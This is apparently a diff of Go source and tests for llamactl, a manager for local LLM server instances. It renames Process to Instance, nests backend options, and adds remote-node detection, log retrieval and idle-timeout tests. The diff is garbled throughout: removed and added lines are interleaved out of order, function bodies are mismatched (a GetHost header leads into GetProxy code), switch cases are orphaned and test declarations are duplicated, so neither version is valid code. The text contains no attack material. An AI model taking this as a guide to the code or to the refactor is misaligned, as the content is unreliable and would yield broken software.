+	if i.proxy != nil {
 		i.proxy.clear()
 	}
 }
 // SetTimeProvider sets a custom time provider for testing
-func (i *Process) SetTimeProvider(tp TimeProvider) {
+func (i *Instance) SetTimeProvider(tp TimeProvider) {
-	i.timeProvider = tp
+	if i.proxy != nil {
 		i.proxy.setTimeProvider(tp)
 	}
 }
-// GetProxy returns the reverse proxy for this instance, creating it if needed
+func (i *Instance) GetHost() string {
 func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.proxy != nil {
 		return i.proxy, nil
 	}
 	if i.options == nil {
-		return nil, fmt.Errorf("instance %s has no options set", i.Name)
+		return "localhost"
 	}
 	return i.options.GetHost()
 }
 func (i *Instance) GetPort() int {
 	if i.options == nil {
 		return 0
 	}
 	return i.options.GetPort()
 }
 // GetProxy returns the reverse proxy for this instance
 func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
 	if i.proxy == nil {
 		return nil, fmt.Errorf("instance %s has no proxy component", i.Name)
 	}
-	var host string
+	return i.proxy.get()
-	var port int
+}
-	switch i.options.BackendType {
+
-	case backends.BackendTypeLlamaCpp:
+func (i *Instance) IsRemote() bool {
-		if i.options.LlamaServerOptions != nil {
+	opts := i.GetOptions()
-			host = i.options.LlamaServerOptions.Host
+	if opts == nil {
-			port = i.options.LlamaServerOptions.Port
+		return false
 		}
 	case backends.BackendTypeMlxLm:
 		if i.options.MlxServerOptions != nil {
 			host = i.options.MlxServerOptions.Host
 			port = i.options.MlxServerOptions.Port
 		}
 	case backends.BackendTypeVllm:
 		if i.options.VllmServerOptions != nil {
 			host = i.options.VllmServerOptions.Host
 			port = i.options.VllmServerOptions.Port
 		}
 	}
-	targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
+	// If no nodes specified, it's a local instance
-	if err != nil {
+	if len(opts.Nodes) == 0 {
-		return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
+		return false
 	}
-	proxy := httputil.NewSingleHostReverseProxy(targetURL)
+	// If the local node is in the nodes map, treat it as a local instance
 	if _, isLocal := opts.Nodes[i.localNodeName]; isLocal {
 		return false
 	}
-	proxy.ModifyResponse = func(resp *http.Response) error {
+	// Otherwise, it's a remote instance
-		// Remove CORS headers from llama-server response to avoid conflicts
+	return true
-		// llamactl will add its own CORS headers
+}
-		resp.Header.Del("Access-Control-Allow-Origin")
+
-		resp.Header.Del("Access-Control-Allow-Methods")
+// GetLogs retrieves the last n lines of logs from the instance
-		resp.Header.Del("Access-Control-Allow-Headers")
+func (i *Instance) GetLogs(num_lines int) (string, error) {
-		resp.Header.Del("Access-Control-Allow-Credentials")
+	if i.logger == nil {
-		resp.Header.Del("Access-Control-Max-Age")
+		return "", fmt.Errorf("instance %s has no logger (remote instances don't have logs)", i.Name)
-		resp.Header.Del("Access-Control-Expose-Headers")
+	}
 	return i.logger.getLogs(num_lines)
 }
 // LastRequestTime returns the last request time as a Unix timestamp
 func (i *Instance) LastRequestTime() int64 {
 	if i.proxy == nil {
 		return 0
 	}
 	return i.proxy.getLastRequestTime()
 }
 // UpdateLastRequestTime updates the last request access time for the instance via proxy
 func (i *Instance) UpdateLastRequestTime() {
 	if i.proxy != nil {
 		i.proxy.updateLastRequestTime()
 	}
 }
 // ShouldTimeout checks if the instance should timeout based on idle time
 func (i *Instance) ShouldTimeout() bool {
 	if i.proxy == nil {
 		return false
 	}
 	return i.proxy.shouldTimeout()
 }
 func (i *Instance) getCommand() string {
 	opts := i.GetOptions()
 	if opts == nil {
 		return ""
 	}
 	return opts.BackendOptions.GetCommand(i.globalBackendSettings)
 }
 func (i *Instance) buildCommandArgs() []string {
 	opts := i.GetOptions()
 	if opts == nil {
 		return nil
 	}
-	i.proxy = proxy
+	return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings)
 }
-	return i.proxy, nil
+func (i *Instance) buildEnvironment() map[string]string {
 	opts := i.GetOptions()
 	if opts == nil {
 		return nil
 	}
 	return opts.BackendOptions.BuildEnvironment(i.globalBackendSettings, opts.Environment)
 }
 // MarshalJSON implements json.Marshaler for Instance
-func (i *Process) MarshalJSON() ([]byte, error) {
+func (i *Instance) MarshalJSON() ([]byte, error) {
-	// Use read lock since we're only reading data
+	// Get options
-	i.mu.RLock()
+	opts := i.GetOptions()
-	defer i.mu.RUnlock()
+
 	// Determine if docker is enabled for this instance's backend
 	dockerEnabled := opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings)
 	// Use anonymous struct to avoid recursion
 	type Alias Process
 	return json.Marshal(&struct {
-		*Alias
+		Name          string   `json:"name"`
-		Options *CreateInstanceOptions `json:"options,omitempty"`
+		Status        *status  `json:"status"`
 		Created       int64    `json:"created,omitempty"`
 		Options       *options `json:"options,omitempty"`
 		DockerEnabled bool     `json:"docker_enabled,omitempty"`
 	}{
-		Alias:   (*Alias)(i),
+		Name:          i.Name,
-		Options: i.options,
+		Status:        i.status,
 		Created:       i.Created,
 		Options:       i.options,
 		DockerEnabled: dockerEnabled,
 	})
 }
 // UnmarshalJSON implements json.Unmarshaler for Instance
-func (i *Process) UnmarshalJSON(data []byte) error {
+func (i *Instance) UnmarshalJSON(data []byte) error {
-	// Use anonymous struct to avoid recursion
+	// Explicitly deserialize to match MarshalJSON format
 	type Alias Process
 	aux := &struct {
-		*Alias
+		Name    string   `json:"name"`
-		Options *CreateInstanceOptions `json:"options,omitempty"`
+		Status  *status  `json:"status"`
-	}{
+		Created int64    `json:"created,omitempty"`
-		Alias: (*Alias)(i),
+		Options *options `json:"options,omitempty"`
-	}
+	}{}
 	if err := json.Unmarshal(data, aux); err != nil {
 		return err
 	}
-	// Handle options with validation and defaults
+	// Set the fields
-	if aux.Options != nil {
+	i.Name = aux.Name
-		aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
+	i.Created = aux.Created
-		i.options = aux.Options
+	i.status = aux.Status
-	}
+	i.options = aux.Options
 	return nil
 }
--- a/pkg/instance/instance_test.go
+++ b/pkg/instance/instance_test.go
@@ -3,38 +3,53 @@ package instance_test
 import (
 	"encoding/json"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
 	"testing"
 	"time"
 )
 func TestNewInstance(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 				Args:    []string{},
 			},
 			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir:             "/tmp/test",
 			DefaultAutoRestart:  true,
 			DefaultMaxRestarts:  3,
 			DefaultRestartDelay: 5,
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-	globalSettings := &config.InstancesConfig{
+	options := &instance.Options{
-		LogsDir:             "/tmp/test",
+		BackendOptions: backends.Options{
-		DefaultAutoRestart:  true,
+			BackendType: backends.BackendTypeLlamaCpp,
-		DefaultMaxRestarts:  3,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		DefaultRestartDelay: 5,
+				Model: "/path/to/model.gguf",
-	}
+				Port:  8080,
-
+			},
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 	// Mock onStatusChange function
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	inst := instance.New("test-instance", globalConfig, options, mockOnStatusChange)
 	if inst.Name != "test-instance" {
 		t.Errorf("Expected name 'test-instance', got %q", inst.Name)
@@ -45,8 +60,8 @@ func TestNewInstance(t *testing.T) {
 	// Check that options were properly set with defaults applied
 	opts := inst.GetOptions()
-	if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
+	if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
+		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -62,94 +77,89 @@ func TestNewInstance(t *testing.T) {
 	if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
 		t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
 	}
 }
-func TestNewInstance_WithRestartOptions(t *testing.T) {
+	// Test that explicit values override defaults
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
 	}
 	// Override some defaults
 	autoRestart := false
 	maxRestarts := 10
-	restartDelay := 15
+	optionsWithOverrides := &instance.Options{
-
+		AutoRestart: &autoRestart,
-	options := &instance.CreateInstanceOptions{
+		MaxRestarts: &maxRestarts,
-		AutoRestart:  &autoRestart,
+		BackendOptions: backends.Options{
-		MaxRestarts:  &maxRestarts,
+			BackendType: backends.BackendTypeLlamaCpp,
-		RestartDelay: &restartDelay,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		BackendType:  backends.BackendTypeLlamaCpp,
+				Model: "/path/to/model.gguf",
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			},
 			Model: "/path/to/model.gguf",
 		},
 	}
-	// Mock onStatusChange function
+	inst2 := instance.New("test-override", globalConfig, optionsWithOverrides, mockOnStatusChange)
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	opts2 := inst2.GetOptions()
-	instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	if opts2.AutoRestart == nil || *opts2.AutoRestart {
 	opts := instance.GetOptions()
 	// Check that explicit values override defaults
 	if opts.AutoRestart == nil || *opts.AutoRestart {
 		t.Error("Expected AutoRestart to be false (overridden)")
 	}
-	if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
+	if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 {
-		t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
+		t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts)
 	}
 	if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
 		t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
 	}
 }
 func TestSetOptions(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 				Args:    []string{},
 			},
 			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir:             "/tmp/test",
 			DefaultAutoRestart:  true,
 			DefaultMaxRestarts:  3,
 			DefaultRestartDelay: 5,
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-	globalSettings := &config.InstancesConfig{
+	initialOptions := &instance.Options{
-		LogsDir:             "/tmp/test",
+		BackendOptions: backends.Options{
-		DefaultAutoRestart:  true,
+			BackendType: backends.BackendTypeLlamaCpp,
-		DefaultMaxRestarts:  3,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		DefaultRestartDelay: 5,
+				Model: "/path/to/model.gguf",
-	}
+				Port:  8080,
-
+			},
 	initialOptions := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 	// Mock onStatusChange function
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
+	inst := instance.New("test-instance", globalConfig, initialOptions, mockOnStatusChange)
 	// Update options
-	newOptions := &instance.CreateInstanceOptions{
+	newOptions := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+		BackendOptions: backends.Options{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			BackendType: backends.BackendTypeLlamaCpp,
-			Model: "/path/to/new-model.gguf",
+			LlamaServerOptions: &backends.LlamaServerOptions{
-			Port:  8081,
+				Model: "/path/to/new-model.gguf",
 				Port:  8081,
 			},
 		},
 	}
 	inst.SetOptions(newOptions)
 	opts := inst.GetOptions()
-	if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
+	if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
-		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
+		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 	}
 	if inst.GetPort() != 8081 {
 		t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
@@ -162,27 +172,43 @@ func TestSetOptions(t *testing.T) {
 }
 func TestGetProxy(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 				Args:    []string{},
 			},
 			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir: "/tmp/test",
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-	globalSettings := &config.InstancesConfig{
+	options := &instance.Options{
-		LogsDir: "/tmp/test",
+		Nodes: map[string]struct{}{"main": {}},
-	}
+		BackendOptions: backends.Options{
-
+			BackendType: backends.BackendTypeLlamaCpp,
-	options := &instance.CreateInstanceOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		BackendType: backends.BackendTypeLlamaCpp,
+				Host: "localhost",
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				Port: 8080,
-			Host: "localhost",
+			},
 			Port: 8080,
 		},
 	}
 	// Mock onStatusChange function
-	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+	mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	inst := instance.New("test-instance", globalConfig, options, mockOnStatusChange)
 	// Get proxy for the first time
 	proxy1, err := inst.GetProxy()
@@ -204,40 +230,34 @@ func TestGetProxy(t *testing.T) {
 }
 func TestMarshalJSON(t *testing.T) {
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
-
+	options := &instance.Options{
-	globalSettings := &config.InstancesConfig{
+		BackendOptions: backends.Options{
-		LogsDir:             "/tmp/test",
+			BackendType: backends.BackendTypeLlamaCpp,
-		DefaultAutoRestart:  true,
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		DefaultMaxRestarts:  3,
+				Model: "/path/to/model.gguf",
-		DefaultRestartDelay: 5,
+				Port:  8080,
-	}
+			},
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
-	// Mock onStatusChange function
+	inst := instance.New("test-instance", globalConfig, options, nil)
 	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
-	instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
+	data, err := json.Marshal(inst)
 	data, err := json.Marshal(instance)
 	if err != nil {
 		t.Fatalf("JSON marshal failed: %v", err)
 	}
-	// Check that JSON contains expected fields
+	// Verify by unmarshaling and checking key fields
 	var result map[string]any
-	err = json.Unmarshal(data, &result)
+	if err := json.Unmarshal(data, &result); err != nil {
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
 	}
@@ -247,37 +267,9 @@ func TestMarshalJSON(t *testing.T) {
 	if result["status"] != "stopped" {
 		t.Errorf("Expected status 'stopped', got %v", result["status"])
 	}
-
+	if result["options"] == nil {
 	// Check that options are included
 	options_data, ok := result["options"]
 	if !ok {
 		t.Error("Expected options to be included in JSON")
 	}
 	options_map, ok := options_data.(map[string]interface{})
 	if !ok {
 		t.Error("Expected options to be a map")
 	}
 	// Check backend type
 	if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
 		t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
 	}
 	// Check backend options
 	backend_options_data, ok := options_map["backend_options"]
 	if !ok {
 		t.Error("Expected backend_options to be included in JSON")
 	}
 	backend_options_map, ok := backend_options_data.(map[string]any)
 	if !ok {
 		t.Error("Expected backend_options to be a map")
 	}
 	if backend_options_map["model"] != "/path/to/model.gguf" {
 		t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
 	}
 	if backend_options_map["port"] != float64(8080) {
 		t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
 	}
 }
 func TestUnmarshalJSON(t *testing.T) {
@@ -295,7 +287,7 @@ func TestUnmarshalJSON(t *testing.T) {
 		}
 	}`
-	var inst instance.Process
+	var inst instance.Instance
 	err := json.Unmarshal([]byte(jsonData), &inst)
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
@@ -312,14 +304,14 @@ func TestUnmarshalJSON(t *testing.T) {
 	if opts == nil {
 		t.Fatal("Expected options to be set")
 	}
-	if opts.BackendType != backends.BackendTypeLlamaCpp {
+	if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
-		t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
+		t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType)
 	}
-	if opts.LlamaServerOptions == nil {
+	if opts.BackendOptions.LlamaServerOptions == nil {
 		t.Fatal("Expected LlamaServerOptions to be set")
 	}
-	if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
+	if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
+		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -332,7 +324,7 @@ func TestUnmarshalJSON(t *testing.T) {
 	}
 }
-func TestCreateInstanceOptionsValidation(t *testing.T) {
+func TestCreateOptionsValidation(t *testing.T) {
 	tests := []struct {
 		name          string
 		maxRestarts   *int
@@ -363,30 +355,45 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
 		},
 	}
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
-	}
+				Command: "llama-server",
-
+				Args:    []string{},
-	globalSettings := &config.InstancesConfig{
+			},
-		LogsDir: "/tmp/test",
+			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir: "/tmp/test",
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			options := &instance.CreateInstanceOptions{
+			options := &instance.Options{
 				MaxRestarts:  tt.maxRestarts,
 				RestartDelay: tt.restartDelay,
-				BackendType:  backends.BackendTypeLlamaCpp,
+				BackendOptions: backends.Options{
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+					BackendType: backends.BackendTypeLlamaCpp,
-					Model: "/path/to/model.gguf",
+					LlamaServerOptions: &backends.LlamaServerOptions{
 						Model: "/path/to/model.gguf",
 					},
 				},
 			}
 			// Mock onStatusChange function
-			mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+			mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-			instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
+			instance := instance.New("test", globalConfig, options, mockOnStatusChange)
 			opts := instance.GetOptions()
 			if opts.MaxRestarts == nil {
@@ -403,3 +410,300 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
 		})
 	}
 }
 func TestStatusChangeCallback(t *testing.T) {
 	globalConfig := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	var callbackOldStatus, callbackNewStatus instance.Status
 	callbackCalled := false
 	onStatusChange := func(oldStatus, newStatus instance.Status) {
 		callbackOldStatus = oldStatus
 		callbackNewStatus = newStatus
 		callbackCalled = true
 	}
 	inst := instance.New("test", globalConfig, options, onStatusChange)
 	inst.SetStatus(instance.Running)
 	if !callbackCalled {
 		t.Error("Expected status change callback to be called")
 	}
 	if callbackOldStatus != instance.Stopped {
 		t.Errorf("Expected old status Stopped, got %v", callbackOldStatus)
 	}
 	if callbackNewStatus != instance.Running {
 		t.Errorf("Expected new status Running, got %v", callbackNewStatus)
 	}
 }
 func TestSetOptions_NodesPreserved(t *testing.T) {
 	globalConfig := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	tests := []struct {
 		name          string
 		initialNodes  map[string]struct{}
 		updateNodes   map[string]struct{}
 		expectedNodes map[string]struct{}
 	}{
 		{
 			name:          "nil nodes preserved as nil",
 			initialNodes:  nil,
 			updateNodes:   map[string]struct{}{"worker1": {}},
 			expectedNodes: nil,
 		},
 		{
 			name:          "empty nodes preserved as empty",
 			initialNodes:  map[string]struct{}{},
 			updateNodes:   map[string]struct{}{"worker1": {}},
 			expectedNodes: map[string]struct{}{},
 		},
 		{
 			name:          "existing nodes preserved",
 			initialNodes:  map[string]struct{}{"worker1": {}, "worker2": {}},
 			updateNodes:   map[string]struct{}{"worker3": {}},
 			expectedNodes: map[string]struct{}{"worker1": {}, "worker2": {}},
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			options := &instance.Options{
 				Nodes: tt.initialNodes,
 				BackendOptions: backends.Options{
 					BackendType: backends.BackendTypeLlamaCpp,
 					LlamaServerOptions: &backends.LlamaServerOptions{
 						Model: "/path/to/model.gguf",
 					},
 				},
 			}
 			inst := instance.New("test", globalConfig, options, nil)
 			// Attempt to update nodes (should be ignored)
 			updateOptions := &instance.Options{
 				Nodes: tt.updateNodes,
 				BackendOptions: backends.Options{
 					BackendType: backends.BackendTypeLlamaCpp,
 					LlamaServerOptions: &backends.LlamaServerOptions{
 						Model: "/path/to/new-model.gguf",
 					},
 				},
 			}
 			inst.SetOptions(updateOptions)
 			opts := inst.GetOptions()
 			// Verify nodes are preserved
 			if len(opts.Nodes) != len(tt.expectedNodes) {
 				t.Errorf("Expected %d nodes, got %d", len(tt.expectedNodes), len(opts.Nodes))
 			}
 			for node := range tt.expectedNodes {
 				if _, exists := opts.Nodes[node]; !exists {
 					t.Errorf("Expected node %s to exist", node)
 				}
 			}
 			// Verify other options were updated
 			if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
 				t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 			}
 		})
 	}
 }
 func TestProcessErrorCases(t *testing.T) {
 	globalConfig := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	inst := instance.New("test", globalConfig, options, nil)
 	// Stop when not running should return error
 	err := inst.Stop()
 	if err == nil {
 		t.Error("Expected error when stopping non-running instance")
 	}
 	// Simulate running state
 	inst.SetStatus(instance.Running)
 	// Start when already running should return error
 	err = inst.Start()
 	if err == nil {
 		t.Error("Expected error when starting already running instance")
 	}
 }
 func TestRemoteInstanceOperations(t *testing.T) {
 	globalConfig := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes: map[string]config.NodeConfig{
 			"remote-node": {Address: "http://remote-node:8080"},
 		},
 		LocalNode: "main",
 	}
 	options := &instance.Options{
 		Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	inst := instance.New("remote-test", globalConfig, options, nil)
 	if !inst.IsRemote() {
 		t.Error("Expected instance to be remote")
 	}
 	// Start should fail for remote instance
 	if err := inst.Start(); err == nil {
 		t.Error("Expected error when starting remote instance")
 	}
 	// Stop should fail for remote instance
 	if err := inst.Stop(); err == nil {
 		t.Error("Expected error when stopping remote instance")
 	}
 	// Restart should fail for remote instance
 	if err := inst.Restart(); err == nil {
 		t.Error("Expected error when restarting remote instance")
 	}
 	// GetProxy should fail for remote instance
 	if _, err := inst.GetProxy(); err != nil {
 		t.Error("Expected no error when getting proxy for remote instance")
 	}
 	// GetLogs should fail for remote instance
 	if _, err := inst.GetLogs(10); err == nil {
 		t.Error("Expected error when getting logs for remote instance")
 	}
 }
 func TestIdleTimeout(t *testing.T) {
 	globalConfig := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	t.Run("not running never times out", func(t *testing.T) {
 		timeout := 1
 		inst := instance.New("test", globalConfig, &instance.Options{
 			IdleTimeout: &timeout,
 			BackendOptions: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			},
 		}, nil)
 		if inst.ShouldTimeout() {
 			t.Error("Non-running instance should never timeout")
 		}
 	})
 	t.Run("no timeout configured", func(t *testing.T) {
 		inst := instance.New("test", globalConfig, &instance.Options{
 			IdleTimeout: nil, // No timeout
 			BackendOptions: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			},
 		}, nil)
 		inst.SetStatus(instance.Running)
 		if inst.ShouldTimeout() {
 			t.Error("Instance with no timeout configured should not timeout")
 		}
 	})
 	t.Run("timeout exceeded", func(t *testing.T) {
 		timeout := 1 // 1 minute
 		inst := instance.New("test", globalConfig, &instance.Options{
 			IdleTimeout: &timeout,
 			BackendOptions: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 					Host:  "localhost",
 					Port:  8080,
 				},
 			},
 		}, nil)
 		inst.SetStatus(instance.Running)
 		// Use mock time provider
 		mockTime := &mockTimeProvider{currentTime: time.Now().Unix()}
 		inst.SetTimeProvider(mockTime)
 		// Set last request time to now
 		inst.UpdateLastRequestTime()
 		// Advance time by 2 minutes (exceeds 1 minute timeout)
 		mockTime.currentTime = time.Now().Add(2 * time.Minute).Unix()
